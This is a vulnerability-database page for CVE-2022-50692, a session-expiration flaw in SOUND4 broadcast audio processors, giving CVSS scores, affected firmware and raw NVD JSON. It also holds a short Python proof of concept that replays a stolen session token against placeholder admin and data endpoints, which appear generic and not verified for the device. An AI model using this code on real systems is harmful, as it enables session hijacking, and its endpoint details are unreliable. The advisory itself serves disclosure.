Security Vulnerability Report
中文
CVE-2022-50692 CVSS 7.5 HIGH

CVE-2022-50692

Published: 2025-12-30 23:15:45
Last Modified: 2026-01-20 18:51:16
Source: [email protected]

Description

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an insufficient session expiration vulnerability that allows attackers to reuse old session credentials. Attackers can exploit weak session management to potentially hijack active user sessions and gain unauthorized access to the application.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:first:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
SOUND4 IMPACT < 2.x
SOUND4 FIRST < 2.x
SOUND4 PULSE < 2.x
SOUND4 Eco < 2.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2022-50692 PoC - Session Hijacking via Reused Session Token # This PoC demonstrates the insufficient session expiration vulnerability import requests import time TARGET_URL = "https://target-device.local/api" SESSION_TOKEN = "previously_captured_or_stolen_session_token" def check_session_validity(): """ Check if old session token is still valid after user logout """ headers = { "Authorization": f"Bearer {SESSION_TOKEN}", "Content-Type": "application/json" } # Step 1: Verify session still works response = requests.get(f"{TARGET_URL}/user/profile", headers=headers) if response.status_code == 200: print("[+] Session token is still valid!") print(f"[+] Response: {response.json()}") # Step 2: Try to access privileged endpoints privileged_endpoints = [ "/admin/settings", "/api/system/config", "/user/sensitive-data" ] for endpoint in privileged_endpoints: resp = requests.get(f"{TARGET_URL}{endpoint}", headers=headers) if resp.status_code == 200: print(f"[+] Successfully accessed: {endpoint}") return True else: print("[-] Session token is invalid") return False if __name__ == "__main__": print("CVE-2022-50692 - SOUND4 Insufficient Session Expiration") check_session_validity()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50692", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:44.537", "lastModified": "2026-01-20T18:51:15.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below contain an insufficient session expiration vulnerability that allows attackers to reuse old session credentials. Attackers can exploit weak session management to potentially hijack active user sessions and gain unauthorized access to the application."}, {"lang": "es", "value": "Las versiones 2.x e inferiores de SOUND4 IMPACT/FIRST/PULSE/Eco contienen una vulnerabilidad de expiración de sesión insuficiente que permite a los atacantes reutilizar credenciales de sesión antiguas. Los atacantes pueden explotar una gestión de sesión débil para potencialmente secuestrar sesiones de usuario activas y obtener acceso no autorizado a la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "33C347FE-DA7B-4137-87B8-E6A8AF4D307F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "0A735654-A166-4B56-BF4D-F165B7E11043"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "5C4CF02A-8CF1-46FF-9EC0-FF779D60B6EA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EC9BD81B-573A-4DA7-AC47-6C8AF1B6B18F"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "18E34118-F11B-4BF2-BE23-7DAE0A6790FB"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "C46BF88C-955C-4F9E-B782-1EADA068F19D"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "E0699DEA-9CDA-4BB4-8FA3-6A6FADE1A61E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "051868AE-E364-4CB3-B927-42B4E0C19D01"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:*", "matchCri ... (truncated)
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.